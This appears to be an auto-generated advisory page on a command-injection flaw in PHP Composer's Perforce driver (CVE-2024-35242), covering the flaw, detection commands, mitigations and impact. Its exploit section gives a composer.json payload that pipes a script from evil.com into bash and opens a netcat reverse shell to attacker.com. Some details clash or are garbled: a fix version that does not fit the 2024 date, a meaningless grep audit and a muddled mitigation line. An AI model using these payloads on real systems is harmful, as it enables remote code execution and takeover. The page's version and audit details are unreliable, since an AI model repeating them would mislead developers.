Composer, Command Injection, CVE-2024-35242 (Critical)

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in the Perforce::generateP4Command() method within Composer’s VCS handling code.
This method builds shell commands by concatenating user-supplied Perforce connection parameters: port, user, and client.
No proper escaping or sanitization is applied to these parameters before they are inserted into the command string.
An attacker can craft a malicious composer.json file that declares a Perforce VCS repository.
Within that repository definition, the attacker injects arbitrary shell metacharacters (e.g., backticks, $(), ;, |) into the port, user, or client fields.
When Composer processes this composer.json, the generateP4Command() method interpolates the tainted values.
The resulting command string is then passed to PHP’s shell_exec() or similar execution function.
Composer executes the command even if the Perforce client (p4) is not installed on the system.
The injected shell commands run with the privileges of the user executing Composer.
VCS repositories are only loaded from the root composer.json in the current working directory.
Additionally, they are loaded from the Composer config directory (e.g., ~/.config/composer/composer.json).
Therefore, the vulnerability cannot be triggered by dependency packages installed via Composer.
An attacker would need to supply a malicious root composer.json file, e.g., by tricking a developer into cloning a poisoned project.
Once the developer runs any Composer command (install, update, require, etc.) in that directory, the payload executes.
The attack works regardless of whether the project actually uses Perforce or any Perforce-related packages.
This is a classic command injection flaw caused by unsafe string interpolation for system shell calls.
The flaw was introduced in the Perforce driver implementation and remained unnoticed until fixed.
The fix applies proper escaping using escapeshellarg() or refactors to avoid shell execution altogether.
Patches were released in Composer versions 2.2.27 (LTS) and 2.9.6 (mainline).

dailycve form:

Platform: PHP Composer
Version: Below 2.2.27
Vulnerability: Perforce command injection
Severity: Critical
date: 2024-06-10

Prediction: Expected 2024-06-11

What Undercode Say:

Analytics

Check Composer version for CVE-2024-35242
composer --version
Detect if vulnerable (version < 2.2.27 or < 2.9.6)
composer show --platform | grep composer
Simulate malicious composer.json payload
cat > composer.json <<EOF
{
"repositories": [
{
"type": "vcs",
"url": "perforce://depot",
"options": {
"port": "localhost:1666; touch /tmp/pwned",
"user": "\$(id > /tmp/id_output)",
"client": "anything"
}
}
]
}
EOF
Execute Composer update (trigger injection)
composer update --dry-run
Check for successful injection
ls -la /tmp/pwned /tmp/id_output
Audit all composer.json files in current directory for dangerous Perforce fields
grep -r -E '"port"|"user"|"client"' composer.json --include=".json" | grep -v "escaped"
Monitor shell command execution from Composer (using strace on Linux)
strace -f -e execve composer install 2>&1 | grep -E "p4|sh -c"

Exploit:

An attacker creates a repository with a malicious composer.json. Example:

{
"repositories": [{
"type": "vcs",
"url": "perforce://attacker",
"options": {
"port": "127.0.0.1:1666; curl http://evil.com/backdoor.sh | bash",
"user": "$(nc -e /bin/sh attacker.com 4444)",
"client": "victim_ws"
}
}]
}

When the victim runs composer install, the injected commands execute. The exploit works without Perforce installed, as Composer still attempts to build the p4 command string.

Protection from this CVE

  • Upgrade Composer immediately to 2.2.27 or 2.9.6 or later.
  • If upgrade impossible, avoid running Composer on untrusted composer.json files.
  • Manually inspect any Perforce repository sections for shell metacharacters.
  • Use `composer validate –no-check-all` to detect malformed JSON but not injection; better to use static analysis.
  • Run Composer in a sandboxed/containerized environment with minimal privileges.
  • Set disable-tls: true? Not relevant; instead, consider removing Perforce driver if not used (not directly possible, but can patch source).

Impact

Successful command injection allows an attacker to execute arbitrary operating system commands under the Composer process owner. This can lead to full system compromise: data theft, malware installation, lateral movement, or privilege escalation. The attack requires only that a developer runs Composer inside a directory containing a malicious root composer.json – a common scenario when cloning untrusted projects or downloading code archives. The impact is critical because Composer is widely used in development and CI/CD pipelines, where it often has broad access to source code, secrets, and deployment credentials.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top